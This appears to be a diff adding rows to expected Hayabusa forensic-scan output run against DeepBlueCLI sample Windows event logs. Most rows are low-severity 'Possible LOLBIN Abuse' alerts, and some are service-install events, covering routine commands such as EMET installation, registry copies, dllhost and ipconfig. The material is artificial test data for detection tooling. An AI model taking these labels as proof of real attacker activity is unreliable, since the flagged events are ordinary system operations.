+2016-09-02 02:01:48.666 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc08 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:03:48.398 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x14b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:09:30.260 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:09:39.134 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:10:01.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1720 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:26:02.115 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb0c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:00:10.327 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x7f4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:05:18.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x12bc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:06:54.664 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:06:54.679 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{86D5EB8A-859F-4C7B-A76B-2BD819B7A850} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:39:28.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:39:28.691 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11e0 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:39:28.743 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:39:28.761 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:39:28.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:39:28.809 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:46:10.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1158 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:46:27.488 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x14c8 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:46:27.704 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x2ec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:47:09.257 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:47:09.370 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x16bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:01.641 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 29CF125E202451A4ADA81BD9D0C1A3B7 | Path: C:\Windows\System32\msiexec.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:09.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22A181542763035A5FF1244203DB5EDC E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:18.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xa48 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpPortSharing restricted | Path: C:\Windows\System32\sc.exe | PID: 0x13e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpPortSharing SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.355 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Net.Tcp Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 05:48:20.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1558 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.416 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Net.Pipe Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 05:48:20.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetPipeActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x1660 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetPipeActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.450 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Net.Msmq Listener Adapter | Path: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"" -NetMsmqActivator | Account: NT AUTHORITY\NetworkService | Start Type: disabled",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 05:48:20.460 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetMsmqActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x968 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetMsmqActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x710 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:22.723 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: ASP.NET State Service | Path: %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Account: LocalSystem | Start Type: disabled,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 05:49:59.321 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x128c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:05.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x17e4 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:05.541 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:19.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4DE932ADC1206E85CE03A5855ECF29FC | Path: C:\Windows\System32\msiexec.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:19.686 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Microsoft EMET Service | Path: ""C:\Program Files\EMET 5.5\EMET_Service.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 05:50:19.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22F8D0F1805E128ED9C40EA3A4181C89 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:20.040 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\microsoft\emet_up hklm\software\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:20.058 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""regsvr32.exe"" /s ""C:\Program Files\EMET 5.5\EMET_CE.DLL"" | Path: C:\Windows\System32\regsvr32.exe | PID: 0x17d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:20.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x13d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:20.214 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\policies\microsoft\emet_up hklm\software\policies\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x17c0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:20.258 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\policies\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x14cc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:53:20.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1598 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:53:20.767 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:53:20.804 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x364 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:53:20.815 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:53:20.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1628 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 06:24:37.363 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x16d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 06:24:37.378 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x148c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:08:33.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:08:33.233 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:08:33.396 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x175c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:08:53.121 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1360 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:10:30.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
